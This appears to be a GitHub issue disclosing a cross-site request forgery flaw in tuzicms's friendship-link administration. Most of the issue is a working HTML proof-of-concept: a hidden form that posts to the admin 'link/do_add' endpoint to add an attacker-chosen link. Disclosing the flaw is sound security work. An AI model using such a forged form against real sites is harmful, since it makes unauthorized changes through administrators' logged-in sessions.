Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
tuzicms,Cross-site Request Forgery exists in routinely managed friendship links
payload:
<html> <body> <script>history.pushState('', '', '/')</script> <form action="http://127.0.0.1/tuzicms-master/index.php/manage/link/do_add" method="POST"> <input type="hidden" name="link_name" value="a" /> <input type="hidden" name="link_url" value="http://www.hack.com" /> <input type="hidden" name="link_sort" value="100" /> <input type="hidden" name="link_description" value="aaa" /> <input type="submit" value="Submit request" /> </form> </body> </html>
The text was updated successfully, but these errors were encountered:
No branches or pull requests
0x00
tuzicms,Cross-site Request Forgery exists in routinely managed friendship links

0x01
payload:
0x02 end
The text was updated successfully, but these errors were encountered: